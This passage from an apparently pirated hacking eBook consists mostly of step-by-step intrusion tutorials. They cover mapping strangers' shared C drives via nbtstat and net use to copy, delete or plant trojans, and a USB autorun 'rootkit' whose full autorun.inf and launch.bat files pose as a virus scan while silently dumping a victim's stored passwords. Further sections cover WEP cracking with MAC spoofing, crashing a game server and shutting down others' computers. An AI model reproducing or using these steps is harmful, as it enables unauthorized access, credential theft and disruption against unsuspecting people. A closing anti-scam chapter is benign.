Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it. The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP. The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into. The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>.

Mail:mtahirzahid@yahoo.com

Page 43


Power Of Hacking® This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ -[Step 4, Breaking In]++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\ (IP Address of Target)”

Mail:mtahirzahid@yahoo.com

Page 44


Power Of Hacking® An example for this tutorial would be: “net view \\192.168.1.103”

We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive. All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is

Mail:mtahirzahid@yahoo.com

Page 45


Power Of Hacking® not in use by your computer. So it could be “net use G...,” for a different target.

As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network

Mail:mtahirzahid@yahoo.com

Page 46


Power Of HackingÂŽ drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,

Mail:mtahirzahid@yahoo.com

Page 47


Power Of Hacking® because you never know if the target changes the sharing setting. Congratulations! You’re DONE! -Commands used in this tutorial: PING NBTSTAT -a (IP Address of Target) NET VIEW \\(IP Address of Target) NET USE K: \\(IP Address of Target)\(SHARENAME) -Program used in this tutorial: Cain and Abel How to hack passwords using USB Drive Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit: MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail:mtahirzahid@yahoo.com

Page 48


Power Of HackingŽ Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more‌ PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. -----------------------------------------------------------------------------------------------Here is a step by step procedre to create the password hacking toolkit: NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it: [autorun] open=launch.bat ACTION= Perform a Virus Scan Mail:mtahirzahid@yahoo.com

Page 49


Power Of Hacking® save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it: start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps 1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option (Perform a Virus Scan). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7 NOTE: This procedure will only recover the stored passwords (if any) on the Computer. How to hack someone with his IP address Introduction Mail:mtahirzahid@yahoo.com

Page 50


Power Of Hacking速 1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document will teach you some simple things about NETBIOS, what it does, how to use it, how to hack with it, and some other simple DOS commands that will be useful to you in the future. 1. Hardware and Firmware 1a. The BIOS The BIOS, short for Basic Input/Output Services, is the control program of the PC. It is responsible for starting up your computer, transferring control of the system to your operating system, and for handling other low-level functions, such as disk access. NOTE that the BIOS is not a software program, insofar as it is not purged from memory when you turn off the computer. It's firmware, which is basically software on a chip. A convenient little feature that most BIOS manufacturers include is a startup password. This prevents access to the system until you enter the correct password. If you can get access to the system after the password has been entered, then there are numerous software-based BIOS password extractors available from your local H/P/A/V site. NETBIOS/NBTSTAT - What does it do? 2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is used for identifying a remote network or computer for file sharing enabled. We can expoit systems using this method. It may be old but on home pc's sometimes it still works great. You can use it on your friend at home or something. I don't care what you do, but remember, that you are reading this document because you want to learn. So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there are two ways, but one's faster. Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT Mail:mtahirzahid@yahoo.com

Page 51


Power Of Hacking速 Method 2:Start>Run>Type Command>Type NBTSTAT (Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.) Ok! Now since you're in the DOS command under NBTSTAT, you're probably wondering what all that crap is that's on your screen. These are the commands you may use. Your screen should look like the following: NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ] -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names. -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics. C:\WINDOWS\DESKTOP> The only two commands that are going to be used and here they are: Mail:mtahirzahid@yahoo.com

Page 52


Power Of Hacking速 -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. Host Names 3. Now, the -a means that you will type in the HOST NAME of the person's computer that you are trying to access. Just in case you don't have any idea what a Host Name looks like here's an example. 123-fgh-ppp.internet.com there are many variations of these adresses. For each different address you see there is a new ISP assigned to that computer. look at the difference. abc-123.internet.com ghj-789.newnet.com these are differnet host names as you can see, and, by identifying the last couple words you will be able to tell that these are two computers on two different ISPs. Now, here are two host names on the same ISP but a different located server. 123-fgh-ppp.internet.com 567-cde-ppp.internet.com IP Addresses 4. You can resolce these host names if you want to the IP address (Internet Protocol) IP addresses range in different numbers. An IP looks like this: 201.123.101.123 Most times you can tell if a computer is running on a cable connection because of the IP address's numbers. On faster connections, usually the first two numbers are low. here's a cable connection IP. 24.18.18.10 on dialup connections IP's are higher, like this: 208.148.255.255 Mail:mtahirzahid@yahoo.com

Page 53


Power Of Hacking速 notice the 208 is higher than the 24 which is the cable connection. REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS. Some companies make IP addresses like this to fool the hacker into believing it's a dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This gives you an idea on IP addresses which you will be using on the nbtstat command. Getting The IP Through DC (Direct Connection) 5. First. You're going to need to find his IP or host name. Either will work. If you are on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname without parenthesis. you will either get a host name or an IP. copy it down. If you do not get it or you are not using mIRC then you must direct connect to their computer or you may use a sniffer to figure out his IP or host name. It's actually better to do it without the sniffer because most sniffers do not work now-a-days. So you want to establish a direct connection to their computer. OK, what is a direct connection? When you are: Sending a file to their computer you are directly connected. AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted. ICQ when sending a file or a chat request acception allows a direct connection. Any time you are sending a file. You are directly connected. (Assuming you know the user is not using a proxy server.) Voice Chatting on Yahoo establishes a direct connection. If you have none of these programs, either i suggest you get one, get a sniffer, or read this next statement. If you have any way of sending thema link to your site that enables site traffic statistics, and you can log in, send a link to your site, then check the stats and get the IP of the last visitor. It's a simple and easy method i use. It even fool some smarter hackers, because it catches them off guard. Anyway, once you are directly Mail:mtahirzahid@yahoo.com

Page 54


Power Of Hacking速 connected use either of the two methods i showed you earlier and get into DOS. Type NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It will show you all computers connected to yours. (This is also helpful if you think you are being hacked by a trojan horse and is on a port that you know such as Sub Seven: 27374.) Your screen should look like this showing the connections to your computer: -----------------------------------------------------------------------------------------------C:\WINDOWS\DESKTOP>netstat -n Active Connections Proto Local Address Foreign Address State TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED C:\WINDOWS\DESKTOP> -----------------------------------------------------------------------------------------------The first line indicated the Protocol (language) that is being used by the two computers. TCP (Transfer Control Protocol) is being used in this and is most widely used. Local address shows your IP address, or the IP address of the system you on. Foreign address shows the address of the computer connected to yours. State tells you what kind of connection is being made ESTABLISHED - means it will stay connected to you as long as you are on the program or as long as the computer is allowing or is needing the other computers connection to it. CLOSE_WAIT means the connection closes at times and waits until it is needed or you resume connection to be Mail:mtahirzahid@yahoo.com

Page 55


Power Of Hacking速 made again. One that isn't on the list is TIME_WAIT which means it is timed. Most Ads that run on AOL are using TIME_WAIT states. the way you know the person is directly connected to your computer is because of this: -----------------------------------------------------------------------------------------------C:\WINDOWS\DESKTOP>netstat -n Active Connections Proto Local Address Foreign Address State TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED C:\WINDOWS\DESKTOP> -----------------------------------------------------------------------------------------------Notice the host name is included in the fourth line instead of the IP address on all. This is almost ALWAYS, the other computer that is connected to you. So here, now, you have the host name: abc-123-ppp.webnet.com If the host name is not listed and the IP is then it NO PROBLEM because either one works exactly the same. I am using abc-123-ppp.webnet.com host name as an example. Ok so now you have the IP and/or host name of the remote system you want to connect to. Time to hack! Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's the crap again. Well, now time to try out what you have leanred from this document by testing it on the IP and/or host name of the remote system. Here's the only thing Mail:mtahirzahid@yahoo.com

Page 56


Power Of Hacking速 you'll need to know. IMPORTANT, READ NOW!!! -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. Remember this? Time to use it. -a will be the host name -A will be the IP How do i know this? Read the Statements following the -a -A commands. It tells you there what each command takes. So have you found which one you have to use? GOOD! Time to start. Using it to your advantage 6. Type this if you have the host name only. NBTSTAT -a (In here put in hostname without parenthesis) Type this is you have the IP address only. NBTSTAT -A (In here put in IP address without parenthesis) Now, hit enter and wait. Now Either one of two things came up 1. Host not found 2. Something that looks like this: -------------------------------------------NetBIOS Local Name Table Name Type Status --------------------------------------------Mail:mtahirzahid@yahoo.com

Page 57


Power Of Hacking速 GMVPS01 <00> UNIQUE Registered WORKGROUP <00> GROUP Registered GMVPS01 <03> UNIQUE Registered GMVPS01 <20> UNIQUE Registered WORKGROUP <1E> GROUP Registered --------------------------------------------If the computer responded "Host not found" Then either one of two things are the case: 1. You screwed up the host name. 2. The host is not hackable. If number one is the case you're in great luck. If two, This system isn't hackable using the NBTSTAT command. So try another system. If you got the table as above to come up, look at it carefully as i describe to you each part and its purpose. Name - states the share name of that certain part of the computer <00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on that share name. Type - Is self-explanatory. It's either turned on, or activated by you, or always on. Status - Simply states that the share name is working and is activated. Look above and look for the following line: GMVPS01 <20> UNIQUE Registered See it? GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that file sharing is enabled on the share name that is on that line with the hex number. So that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's How to do it. (This is the hard part) Mail:mtahirzahid@yahoo.com

Page 58


Power Of Hacking速 LMHOST File 7. There is a file in all Windows systems called LMHOST.sam. We need to simply add the IP into the LMHOST file because LMHOST basically acts as a network, automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in LMHOST and hit enter. when it comes up open it using a text program such as wordpad, but make sure you do not leave the checkmark to "always open files with this extension" on that. Simply go through the LMHOST file until you see the part: # This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts # files and offers the following extensions: # # #PRE # #DOM: # #INCLUDE # #BEGIN_ALTERNATE # #END_ALTERNATE # \0xnn (non-printing character support) # # Following any entry in the file with the characters "#PRE" will cause # the entry to be preloaded into the name cache. By default, entries are # not preloaded, but are parsed only after dynamic name resolution fails. # # Following an entry with the "#DOM:" tag will associate the # entry with the domain specified by . This affects how the # browser and logon services behave in TCP/IP environments. To preload # the host name associated with #DOM entry, it is necessary to also add a # #PRE to the line. The is always preloaded although it will not Mail:mtahirzahid@yahoo.com

Page 59


Power Of Hacking速 # be shown when the name cache is viewed. # # Specifying "#INCLUDE " will force the RFC NetBIOS (NBT) # software to seek the specified and parse it as if it were # local. is generally a UNC-based name, allowing a # centralized lmhosts file to be maintained on a server. # It is ALWAYS necessary to provide a mapping for the IP address of the # server prior to the #INCLUDE. This mapping must use the #PRE directive. # In addtion the share "public" in the example below must be in the # LanManServer list of "NullSessionShares" in order for client machines to # be able to read the lmhosts file successfully. This key is under # \machine\system\currentcontrolset\services\lanmans erver\parameters\nullsessionshares # in the registry. Simply add "public" to the list found there. # # The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE # statements to be grouped together. Any single successful include # will cause the group to succeed. # # Finally, non-printing characters can be embedded in mappings by # first surrounding the NetBIOS name in quotations, then using the # \0xnn notation to specify a hex value for a non-printing character. Read this over and over until you understand the way you want your connection to be set. Here's an example of how to add an IP the way I would do it: #PRE #DOM:255.102.255.102 #INCLUDE Pre will preload the connection as soon as you log on to the net. DOM is the domain or Mail:mtahirzahid@yahoo.com

Page 60


Power Of Hacking速 IP address of the host you are connecting to. INCLUDE will automaticall set you to that file path. In this case as soon as I log on to the net I will get access to 255.102.255.102 on the C:/ drive. The only problem with this is that by doin the NETSTAT command while you are connected, and get the IP of your machine. That's why it only works on simple PC machines. Because people in these days are computer illiterate and have no idea of what these commands can do. They have no idea what NETSTAT is, so you can use that to your advantage. Most PC systems are kind of hard to hack using this method now because they are more secure and can tell when another system is trying to gain access. Also, besure that you (somehow) know whether they are running a firewall or not because it will block the connection to their computer. Most home systems aren't running a firewall, and to make it better, they don't know how operate the firewall, therefore, leaving the hole in the system. To help you out some, it would be a great idea to pick up on some programming languages to show you how the computer reads information and learn some things on TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out whether they are running a firewall, simply hop on a Proxy and do a port scan on their IP. You will notice if they are running a firewall because most ports are closed. Either way, you still have a better chance of hacking a home system than hacking Microsoft. Gaining Access 7. Once you have added this to you LMHOST file. You are basically done. All you need to do is go to: Start Find Computer Once you get there you simply type the IP address or the host name of the system. When it comes up, simply double click it, and boom! There's a GUI for you so you Mail:mtahirzahid@yahoo.com

Page 61


Power Of Hacking速 don't have to use DOS anymore. You can use DOS to do it, but it's more simple and fun this way, so that's the only way i put it. When you open the system you can edit, delete, rename, do anything to any file you wish. I would also delete the command file in C:/ because they may use it if they think someone is in their computer. Or simply delete the shortcut to it. Then here's when the programming comes in handy. Instead of using the NBTSTAT method all the time, you can then program you own trojan on your OWN port number and upload it to the system. Then you will have easier access and you will also have a better GUI, with more features. DO NOT allow more than one connection to the system unless they are on a faster connection. If you are downloading something from their computer and they don't know it and their connection is being slow, they may check their NETSTAT to see what is connected, which will show your IP and make them suspicious. Thats it. All there is to it. Now go out and scan a network or something and find a computer with port 21 or something open. Hacking WEP wifi passwords 1. Getting the right tools Download Backtrack 3. It can be found here: http://www.remote-exploit.org/backtrack_download.html The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you. 2. Preparing the victim network for attack Mail:mtahirzahid@yahoo.com

Page 62


Power Of Hacking速 Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card. Type: airmon-ng You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type: airmon-ng stop ath0 then type: ifconfig wifi0 down then: macchanger --mac 00:11:22:33:44:55 wifi0 then: airmon-ng start wifi0 What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on... Now it's time to discover some networks to break into. Type: airodump-ng ath0 Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all. Once you see the network that you want to crack, do this: hold down ctrl and tap c This will stop airodump from populating networks and will freeze the screen so that Mail:mtahirzahid@yahoo.com

Page 63


Power Of Hacking速 you can see the info that you need. **Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type: -c (channel) then dont actually type in -c (channel) Instead, replace that with whatever the channel number is...so, for example you would type: -c 6 Can't be much clearer than that...lets continue... Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a

Mail:mtahirzahid@yahoo.com

Page 64


Power Of Hacking速 whole other ball game and you need to master WEP first.

Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n The Channel number will be under a heading that says "CH". Now, in the same Konsole window, type: airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0 the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it. **Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc. Mail:mtahirzahid@yahoo.com

Page 65


Power Of Hacking速 Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second. 3. Actually cracking the WEP password Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

Mail:mtahirzahid@yahoo.com

Page 66


Power Of Hacking速 aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password. Now you need to open up a 3rd and final Konsole window. This will be where we Mail:mtahirzahid@yahoo.com

Page 67


Power Of Hacking速 actually crack the password. Type: aircrack-ng -b (bssid) (filename)-01.cap Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it

Mail:mtahirzahid@yahoo.com

Page 68


Power Of Hacking速 finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network. Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as: se:cr:et This would obviously be the ASCII format. If it was a HEX encrypted password that Mail:mtahirzahid@yahoo.com

Page 69


Power Of Hacking速 was something like "0FKW9427VF" then it would still display as: 0F:KW:94:27:VF Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in! It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes. I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-) I will gladly answer any legitimate questions anyone has to the best of my ability. HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right. There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future. How to hide files in a jpg Set up: 1. Must have a .zip or .rar compressor. 2. Willingness to learn. Steps: Mail:mtahirzahid@yahoo.com

Page 70


Power Of Hacking速 1. Save the picture of choice to your desktop. 2. Make a new .rar or .zip folder on your desktop. 3. Add the files you want to hide into the .zip or .rar 4. Click start menu, run, cmd. 5. In Command Prompt type cd "desktop" with the quotation marks. 6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg ( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg ) 7. Now there should be the outputed file name with a .jpg extension on the desktop. ( Do not close Command Prompt just yet ) 8. Double click it to open the picture and check it out. 9. When your done looking, and want to view the hidden files Type: ren outputfilename.jpg outputfilename.rar or zip Now you're done! A quick info-fact: With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar. With this technique the Al-Qaeda operatives were able to send info to others secretively. How To Kick Everyone From A Counter Strike Source Server INSTRUCTIONS: 1. Place Buffer1.cfg and Buffer2.cfg in your cfg folder. If it doesn't exist, make it (see below) (Commonly C:\User\program files\steam\steamapps\Account name\counter-strike source\cstrike\cfg) er 2. Go in game, open the developer's console, and type in the following (you may change Mail:mtahirzahid@yahoo.com

Page 71


Power Of Hacking速 bind key): Bind M "wait;exec Buffer1;exec Buffer2" (If developer's console doesn't open, go to options, keyboard, advanced, enable developer's console) 3. Go in game and rapidly hit the M key to crash the server. Depending on how fast you hit it, it should take anywhere from 15-30 seconds to crash. Don't stop hitting the key until you get a message: "Client # has overflowed reliable channel." Link to Buffers: http://www.megaupload.com/?d=2RTOUUBU Or check: G:\X-file\Stuff\Buffer Overflow.rar How to kick someone of a wireless network Step 1: Open cmd. Step 2: Write shutdown -i Step 3: Choose a Victim from the list Step 4: Choose to shutdown their computer Step 5: Make the warning pop up 1 sec before shutting down. Step 6: Click Ok.

Mail:mtahirzahid@yahoo.com

Page 72


Power Of Hacking®

Done! :) Ultimate Guide on Anti-Scamming Table of Contents. Chapter 1 - Introduction. Chapter 2 - Different Types of Scammers. Chapter 3 - Main Scamming Methods. Chapter 4 - Unknown Scamming Methods. Chapter 5 - Buying Installs. Chapter 6 – Buying Crypting. Chapter 7 - How Not to be a Victim. Chapter 8 – What To Do If You Get Scammed. Chapter 1 - Introduction.

Mail:mtahirzahid@yahoo.com

Page 73


Power Of Hacking® Thank you for buying my eBook! In this eBook you will learn many things such as, finding out the different kinds of scammers, known/highly used methods of scamming, unknown methods of scamming and lastly; how not to be a victim. Chapter 2 - Different Types of Scammers. The main thought in someone's head is, " Low post count/ new to forum must be a scammer!". That is a horrible misconception which could lead you to getting scammed. Only about, 4 out of every 20 new people may scam. Now, you may be wondering what other kinds of scammers could there be? There's actually 2 more types. The Three Types. Users with little-none rep, and basically no posts. Users with low amount of rep, but over 100-200 posts. Users with a lot of rep, and over 400-500 posts. Users with low rep, but decent amount of posts can still be scammers. Some people assume that the more post's and rep you have, the safer you are. Another bad misconception. Even though people with High Rep + A lot of post's, are rarely scammers; there have been a good amount of people who where trusted sellers/buyers. Chapter 3 - Main Scamming Methods. There are actually quite a few highly known scamming methods, I will list them below. Method 1. The first is what I call, T&B. T&B stands for, Take and Block. What scammers will usually do is, as soon as they get access to the product they want then block you from MSN. (What a “T&B” may look like.) Victim: Hmm, alright since I'm new to this forum I'll go first. Mail:mtahirzahid@yahoo.com

Page 74


Power Of Hacking® Scammer: Alright thanks man. Just send me information when you're ready! Victim: Alrighty, the login information to the account is, user name = abc123 and password = 123abc. Scammer: Alright thank you, let me try it out. Victim: No problem. Scammer: Alright it works thank you! Scammer: Paypal information? Victim: Alright 1 second. “Victim” has been blocked from MSN. And just like that, the victim is out of a account. To fight against this method, Never go first. If you are suspicious about someone in any way at all. Use a trusted middle man. If the buyer/seller is legit, they will not mind. Method 2. The second method is where, someone steal's a trusted user's account. Now this is a method that is hard to detect, but can be, detected with a few easy steps. If you are suspicious about a higher trusted member's account getting hacked, wait a few days or so before purchasing or selling. Do all the research you can on this member to see If you can find out anything different. Look at the user's posts, look for MSN information, how they use grammar, how they treat others etc. EXAMPLE You find a leet/uber wanted to buy your product. But your noticing that they may be trying to rush through MSN. This is example on how you could figure out If they got hacked. Grammar Before the Day in Question.

Mail:mtahirzahid@yahoo.com

Page 75


Power Of Hacking® “Thank you for the helpful information! I am glad to stumble a fantastic member like you, you're very helpful. I hope to run some in to some members like you!” Grammar on the Day of Question. “Thanks man. Yeah, youre pretty cool I wanna buy from you sometime.” Notice the grammar difference's? Pretty obvious that either, someone hacked his account, or someone is using his account that he knows. To fight against this, wait a few day's and see If he claims that he was hacked or anything. Chapter 4 - Unknown Scamming Methods. The following methods are rarely used methods, and when used are usually very effective. These following methods usually scam people the easiest. The scammer will usually take a good amount of time doing this. FIRST METHOD Many sellers will usually ask for a PM If they are in doubt of the buyer. If the scammer is skilled enough/smart enough they can get around this. Instead of sending a PM they will fake there name in Google Chrome. (Chrome has a built in editing feature) What I mean is, with chrome scammers will usually do this, with a simple change of text. As you can

Mail:mtahirzahid@yahoo.com

Page 76


Power Of Hacking® see, I changed my name from Chloroform, to Omniscient. In Chrome.

